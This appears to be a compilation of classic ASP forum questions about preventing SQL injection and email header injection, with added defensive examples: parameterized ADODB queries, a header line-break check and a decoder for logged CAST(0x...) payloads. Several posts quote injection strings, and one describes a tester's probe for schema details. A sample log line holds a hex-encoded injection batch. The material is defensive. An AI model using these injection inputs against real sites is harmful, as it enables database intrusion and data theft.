Is it possible to "intercept" all calls to conn.execute and have them go to
a checking routine that will either let the command go through or terminate
it if it contains some illegal instructions? My client's company has had its
hacker-free status revoked due to the possibility of SQL injection. I could
put a function before every single conn.execute but we have hundreds of
them. Just wondering if there is some way of telling it to do something else
first. Maybe I can redefine conn.execute somehow?
I am using the method below to make sure that the query isNumeric and not longer than 4. It's a little snippet I found in another post... It works fine but I'm questioning whether it's enough.
URLs like this, itemdetail.asp?-=#&ItemID=906, don't throw any errors because the "ItemID=906" is fine. Does the method used below really protect against SQL injections in this case?
I have been given a site to redo. In the process of looking at the code, the live site is open to SQL injection. I know what needs to be done but have limited time right now to redo it correctly. In the interim while I am rewriting the site, will adding a few lines of code as below prevent SQL injection until I have the time to rebuild the functions and move to stored procedures?
Basically client side I added a onKeypress javascript routine to look for ' or " and disallow in login fields ....
Are there specific security precautions (input validations for example) that are documented somewhere to prevent hackers from compromising a credit card ASP application? In particular, can we prevent a buffer overflow by using the LEFT function to grab only the necessary characters from the credit card text field?
I recently built a login page and a friend of mine was working on something similar and said that I need to protect the login from SQL injection. I am not really sure what exactly that is. I think I have a rough idea but can someone explain it to me? In addition, I will need to obviously protect what I built and am not sure how to go about doing that either.
Does anybody have a list of dodgy characters that can be used for SQL injection attacks so that I can figure out a way to strip them from user inputs? Also, if somebody was filling in a form that inserts into a "memo" field in Access, could this be used to launch such an attack, or would whatever they type simply be inserted into the field? I hope that bit is clear. I have a form field "message" which is a multi-line text box; if someone typed into that box
DELETE * FROM Messages WHERE MessageID =1205
or some other command, would that simply be inserted into the database or would the server try and execute the command?
I have heard a lot about SQL Injection. I was wondering how does an injector come to know about the table/column name when they cannot see the asp codes in a website?
I have written several site functions to hopefully prevent cross-site hacking, SQL injection, and URL encoding issues. I also have a symmetric key encryption that is pretty basic (which isn't posted here and is total overkill). I was wondering if these functions are protecting well enough, or am I missing some tests?
Function InjFix(val)
    ' Doubles any single quote (so it cannot close a string literal in SQL),
    ' trims whitespace, then HTML-encodes the result for output
    InjFix = SEncode(Trim(Replace(val, "'", "''")))
End Function

Function SEncode(val)
    ' HTML-encodes <, >, & and quotes for safe display in a page
    SEncode = Server.HtmlEncode(val)
End Function

Function URLEncode(val)
    ' Percent-encodes a value for use inside a query string
    URLEncode = Server.URLEncode(val)
End Function
I have feedback forms on several of my sites and recently, they have been plagued with email injection attacks.
The forms are pretty straight-forward. Half a dozen fields get submitted to a formhandler.asp page where the contents are sent to some hard-coded email addresses using ASPmail.
From what I understand about how this works, spambots are used to add carriage returns after some of the form fields and then adding BCCs in to use the form to send out spam to other addresses. Here's an example of the emails I'm getting: .....
I have always validated user input to pieces prior to integrating it into a SQL statement, in order to avoid SQL injection attacks. A colleague of mine told me that binding my vars would make them SQL scalar, but I have been left in the dark as to HOW... The web left me none the wiser, as well, so here goes: Anyone got a brief example of binding vars in ASP to get me started?
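The binding the colleague meant is a parameterized query: the SQL text is fixed and each value travels as a typed parameter, so it can never be parsed as SQL. This is an added example in classic ASP (VBScript) using ADODB.Command, not code from any of the posts above; it assumes an open ADODB.Connection `conn` and tables `Items(ItemID int, Name nvarchar)` and `Users(UserID, UserName nvarchar(50))`, and shows the concatenated form beside the parameterized one.

```vbscript
' Added example: parameterized queries in classic ASP via ADODB.Command.
' Assumes an open ADODB.Connection in conn and the Items/Users tables named in the lead-in.
Const adCmdText = 1
Const adInteger = 3
Const adVarWChar = 202
Const adParamInput = 1

' Vulnerable form: the input becomes part of the SQL text, so
' ?ItemID=906 OR 1=1 changes the query instead of the value.
Function BuildConcatenated(itemId)
    BuildConcatenated = "SELECT Name FROM Items WHERE ItemID = " & itemId
End Function

' Hardened form: the SQL text never changes; the value is sent as an adInteger
' parameter, so quote-doubling and keyword stripping are unnecessary.
Function GetItemName(conn, rawItemId)
    Dim cmd, rs
    ' Coarse type check before any query runs; the typed parameter does the real work.
    If Not IsNumeric(rawItemId) Or Len(rawItemId) > 9 Then
        GetItemName = Empty
        Exit Function
    End If
    Set cmd = Server.CreateObject("ADODB.Command")
    cmd.ActiveConnection = conn
    cmd.CommandType = adCmdText
    cmd.CommandText = "SELECT Name FROM Items WHERE ItemID = ?"
    cmd.Parameters.Append cmd.CreateParameter("ItemID", adInteger, adParamInput, , CLng(rawItemId))
    Set rs = cmd.Execute
    If rs.EOF Then
        GetItemName = Empty
    Else
        GetItemName = rs("Name")
    End If
    rs.Close
End Function

' A string parameter for a login form, sized to the column: a value such as
' ' OR 1=1-- is compared literally against UserName and matches nothing.
Function FindUser(conn, userName)
    Dim cmd
    Set cmd = Server.CreateObject("ADODB.Command")
    cmd.ActiveConnection = conn
    cmd.CommandText = "SELECT UserID FROM Users WHERE UserName = ?"
    cmd.Parameters.Append cmd.CreateParameter("UserName", adVarWChar, adParamInput, 50, userName)
    Set FindUser = cmd.Execute
End Function
```

The same pattern works for stored procedures by setting CommandType to adStoredProc (4) and CommandText to the procedure name.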
I believe someone is using my contact form and sending out spam. I'm getting thousands of undeliverable emails.
I don't know anything about ASP. Someone who used to work here wrote the form processing script and it seems that all the forms on different domains are being processed by this script. It seems like they didn't do any sort of validation or checks, and on one website there are hundreds of pages with the contact form; I could do it in PHP but that is way too much work.....
I have just started a new job and I'm in charge of the databases at a college. We have a web page that the students can access to see their profile and course details, which is causing problems.
The students have to log into an e-learning site called Moodle, which is fine (Moodle is all written in PHP). From there they can just browse Moodle, which has news and a message board etc. They can then also click a link to their profile; it is then directed to an ASP page, but it uses their login details from the PHP Moodle site to retrieve their details from the database and display them on the ASP web page.
I have a multi-page ASP web application that uses information sent to it from the client in the Request.Forms collection, the Request.QueryString collection and the Request.Cookie collection.
What I want to do is to sanitise ALL the information sent to EVERY page.
I thought I'd achieve this by having an INCLUDE file inserted at the top of EVERY page.
This include file iterates through EVERY form, querystring and cookie item and removes anything that looks like malicious SQL injections from the values. Having completed this task, the many web pages then access the sanitised Request object with impunity.
One minor drawback is that it doesn't seem to work... I can't update the Request object with the sanitised value. [Error message: VBScript runtime error: Object doesn't support this property or method]
Either it's something silly in my coding or it's the wrong approach....please advise accordingly (code below).....
Can anyone find fault with this code? I wrote it in hopes of preventing users from "breaking" SQL queries and getting places they shouldn't by using SQL injections.
I have been working on this particular project for a little over 2 weeks now. This product contains between 700-900 stored procedures to handle just about all you can imagine within the product. I just personally rewrote/reformatted close to 150 of them myself. Nothing too fancy, mostly a lot of formatting. We have a little down time between Q/A and fixing any bugs they find, so I decided to test the security of the site with cross-site scripting and SQL injection. Because SPs are used in pretty much every aspect of the site, the site isn't vulnerable to the simple injection stuff like ' OR 1 = 1. Instead I've had to try several things which I will get to in a minute. As I have access to all of these SPs and the DB in which they reside, I could easily look at the code and determine what variables are needed to pass in. I've been trying to break the site to give up a database name so I can proceed to check the system tables etc etc - much like a regular hacker would (meaning not cheating by looking at the code). So, I've started my attack by downloading a local version of the login page, changing a few variables and injecting something like:
'SELECT * FROM INFORMATION_SCHEMA.TABLES
Initially, the statement is passed into the form fields and won't return anything other than a JS popup error. I altered the statement intentionally to break the page
SELECT * FROM INFORMATION_SCHEMA.TA'
and it produces an error giving me the name of the query and its location. When I plug the name of the query in the URL, i.e. http://theurl.com/query_folder/query_name/, it fires me off to another folder containing an include file of some sort. When I run that include it gives me the name of a pretty important variable. Apparently it's a variable that determines what DB I should point to.
Now, one of the issues I have is that everything is a stored procedure so trying to hack it is a little more difficult ....
Recently our contact forms on the website have been receiving messages with html links in the text entry fields. I'm assuming that a bot or something is using my mail script and bypassing the contact form.
I have seen posts about most other mail scripts in PHP that say the bots are injecting their own header information and effectively writing the message to their own BCC list.
Does someone have a thread out there about this, and what can I do to keep people from sending HTML links through my forms to their own list? How do I check to see if they're successful, or if I'm just getting a bunch of tests hitting the form and the messages are only coming to me, the specified recipient?
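Header injection of the kind described in the two form posts above works by smuggling a line break into a field that the handler copies into a mail header, so that whatever follows the break (a Bcc: line, for instance) becomes a new header. The check below is an added example in classic ASP, not code from any of the posts or from ASPmail; it assumes a `formhandler.asp` that copies the form fields `name`, `email` and `subject` into headers and keeps the message body separate.

```vbscript
' Added example: reject any header-bound form value containing a line break.
' Assumes the form fields named in the lead-in; the body field is not checked here
' because a multi-line message is legitimate there and is not placed in a header.
Function IsSafeHeaderValue(value)
    Dim re
    IsSafeHeaderValue = True
    If IsNull(value) Then Exit Function
    ' A raw CR or LF terminates the current header; anything after it is parsed as a new one.
    If InStr(value, vbCr) > 0 Or InStr(value, vbLf) > 0 Then
        IsSafeHeaderValue = False
        Exit Function
    End If
    ' Request.Form values are already URL-decoded, but a literal %0A or %0D can still
    ' become a line break if some downstream component decodes the value again.
    Set re = New RegExp
    re.IgnoreCase = True
    re.Pattern = "%0[ad]"
    If re.Test(value) Then IsSafeHeaderValue = False
End Function

' Returns a comma-separated list of offending field names, or "" when all are clean,
' so the request can be logged and rejected before anything reaches the mail component.
Function CheckMailForm(headerFieldNames)
    Dim i, bad
    bad = ""
    For i = 0 To UBound(headerFieldNames)
        If Not IsSafeHeaderValue(Request.Form(headerFieldNames(i))) Then
            If bad <> "" Then bad = bad & ","
            bad = bad & headerFieldNames(i)
        End If
    Next
    CheckMailForm = bad
End Function

' Usage at the top of formhandler.asp, before building the message:
' offending = CheckMailForm(Array("name", "email", "subject"))
' If offending <> "" Then
'     Response.Status = "400 Bad Request"
'     Response.Write "Rejected fields: " & Server.HTMLEncode(offending)
'     Response.End
' End If
```

Logging the rejected requests also answers the "are they succeeding or just probing" question: a steady stream of rejections with no bounce-backs afterwards indicates the probes are being stopped.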
I created an ISAPI dll application to prevent SQL Injection attempts by intercepting the HTTP requests and sanitizing both GET and POST variables (or any combination of both) before the request reaches the intended code. This is especially useful for legacy applications not designed to deal with MS SQL Server Injection attempts. Though this application was designed with MS SQL Server in mind, it can be used with no or minimal changes with other database engines.
This ISAPI is only compatible with Internet Information Server (IIS) 6.0 which comes with Windows 2003. Windows XP uses IIS 5 engine which DOES NOT support ISAPI Wildcard.
One of my servers has been compromised by this virus, and I can't seem to block it out! I have shut down the infected server, but I need to figure out how to check for this and stop it.
The site is running IIS 5 on Windows 2000; the backend DB is SQL Server 2000.
Can anyone point me to some good resources for this? Code:
We log hundreds of SQL injection attempts per day -- the type with CAST(0x44004500... AS VARCHAR(4000)). It amuses me that the last thing the attack does is DEALLOCATE its cursor. My SQL Server DBA tells me this makes no difference. So...
Are these hackers cargo cultists? Or am I missing something?
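For triaging the logged attempts above, it helps to pull the hex out of the CAST(0x... AS NVARCHAR(4000)) pattern and decode it, since the bytes are the UTF-16LE text of the batch that was executed (0x4400450043... reads as "DEC..."). This is an added example, not from the post; the log line is constructed, in IIS-style URL encoding, and its hex decodes to just "DECLARE @T".

```vbscript
' Added example: flag log lines carrying a CAST(0x... AS [N]VARCHAR) payload and decode it.
' Constructed sample line: the hex is UTF-16LE for "DECLARE @T".
Const SampleLine = "2008-06-01 10:00:00 GET /default.asp id=1;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004c00410052004500200040005400%20AS%20NVARCHAR(4000));EXEC(@S);-- 500"

' True when every second byte is zero, the shape an NVARCHAR cast of ASCII text produces.
Function LooksUtf16(hex)
    Dim i
    LooksUtf16 = True
    For i = 3 To Len(hex) Step 4
        If Mid(hex, i, 2) <> "00" Then LooksUtf16 = False
    Next
End Function

' Decode hex to text, as UTF-16LE when the length and byte pattern fit, else as single bytes.
Function HexToText(hex)
    Dim i, stepSize, code, s
    s = ""
    stepSize = 2
    If Len(hex) Mod 4 = 0 And LooksUtf16(hex) Then stepSize = 4
    For i = 1 To Len(hex) Step stepSize
        If stepSize = 4 Then
            ' little-endian: the high byte is the second pair
            code = CLng("&H" & Mid(hex, i + 2, 2) & Mid(hex, i, 2))
        Else
            code = CLng("&H" & Mid(hex, i, 2))
        End If
        If code < 0 Then code = code + 65536  ' &H8000-&HFFFF convert as negative Integers
        s = s & ChrW(code)
    Next
    HexToText = s
End Function

' Returns the decoded payload when the line matches, or "" when it does not.
' Spaces may appear raw, as %20 or as + in the logged query string.
Function ExtractCastPayload(line)
    Dim re, m
    Set re = New RegExp
    re.IgnoreCase = True
    re.Pattern = "CAST\(0x([0-9a-f]+)(\s|%20|\+)+AS(\s|%20|\+)+N?VARCHAR"
    ExtractCastPayload = ""
    Set m = re.Execute(line)
    If m.Count > 0 Then ExtractCastPayload = HexToText(m(0).SubMatches(0))
End Function

' Usage from a WSH script over a log file: WScript.Echo ExtractCastPayload(SampleLine)
```

Running this over a day of log lines gives the decoded batches in the clear, which is what the DBA needs to confirm which tables the attempts were aimed at.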
I use dynamic SQL queries in my sites. I know this is bad, but I grew up using Access as a data source and learned bad habits.
One of my MsSQL Server databases has just been hacked, despite me stripping common words/punctuation from the SQL statements - which I thought would prevent injection attack.
What I currently do is this (using three functions to strip out HTML, quotation marks and T-SQL code):
My client received an email from a user who mentioned that by accident they had been typing (over the querystring I guess), and the url had become:
default.asp?pageid='asd
They then received a SQL Server error message.
My client contacted their webhost, who came back to them promptly and talked of 'SQL Injection', they said that we would need to secure the code as well as the permissions on the database(which I believe they have done)..
This is something I had overlooked, and started to write a fix for a couple of nights ago... but I don't think it's 100%....
Basically I now do this at the top of my default.asp page ...
I am working on an ecommerce app and want to be able to take my entire POST results as one item (or iterate through them) and check for any malicious SQL injection items. After checking/escaping them I want to save them back into the POST results. The reason for this is that I have coded the entire app and just learned about the dangers of SQL injection, and rather than going through every POST var and fixing it I would rather run a function at the beginning of each page.
I've seen plenty of articles and utilities for preventing form injections for ASP.NET, but not too much for classic ASP. Are there any good input validation scripts that you use to avoid form injection attacks? I'm looking for good routines I can reuse on all of my form processing pages.
This is weird. I'm pretty familiar with SQL injection, but we're getting these weird injections that are writing into the default document or home page. What it's doing is putting script code at the top or bottom of the home page... it looks something like this:
What it's doing is decoding itself into an iframe that links out to popups that will try and download a virus onto your machine. I don't get the popup on my machine because I think I have a newer version of IE. But some people have complained that it is installing a virus on their machine.
Also, what is crazy is when I replace the file with a good version, in about 30 mins it is automatically overwritten with the infected version. I've also noticed it on some other websites that I haven't touched.
Has anyone encountered this before? Because I'm stumped as to the cause of it. I don't see the issue on our dev server. It seems to be IIS on a shared host.